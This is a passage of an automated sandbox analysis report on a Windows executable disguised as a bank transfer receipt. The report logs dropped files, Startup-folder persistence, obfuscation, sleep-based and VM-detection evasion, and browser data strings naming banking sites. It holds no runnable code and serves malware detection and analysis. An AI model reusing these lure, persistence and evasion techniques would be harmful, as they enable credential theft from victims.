                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic file information: File size 2084352 > 1048576
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1fc400
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4096648.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4096648.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3ce3020.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2118219479.0000000006700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.62f0000.8.raw.unpack, bfRM8NkZJ0xIbVmvBJ9.csHigh entropy of concatenated method names: 'sj6kS1P8dG', 's3YkaY0FXG', 'hBokXS2YEw', 'A68kTULqao', 'xFvkrycmoC', 'Yf7k3rAukt', 'uYLkqIFW1u', 'rfGkxY5HUT', 'YXckNELN8d', 'EnjkFSupR6'
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\IsClosed.exeJump to dropped file

                    Boot Survival

                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeWindow / User API: threadDelayed 1815Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeWindow / User API: threadDelayed 684Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeWindow / User API: threadDelayed 2143Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1680Thread sleep count: 1815 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1680Thread sleep count: 684 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99655s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99532s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99071s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -98953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -98844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 4160Thread sleep count: 2143 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99326s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99891Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99655Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99532Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99422Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99313Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99188Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99071Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 98953Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 98844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99326Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: WebData.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: IsClosed.exe, 00000005.00000002.2222475791.0000000000A21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXs<
                    Source: WebData.2.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: WebData.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: WebData.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: WebData.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: WebData.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: WebData.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: WebData.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2089736087.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: WebData.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: WebData.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: WebData.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: AMC password management pageVMware20,11696428655
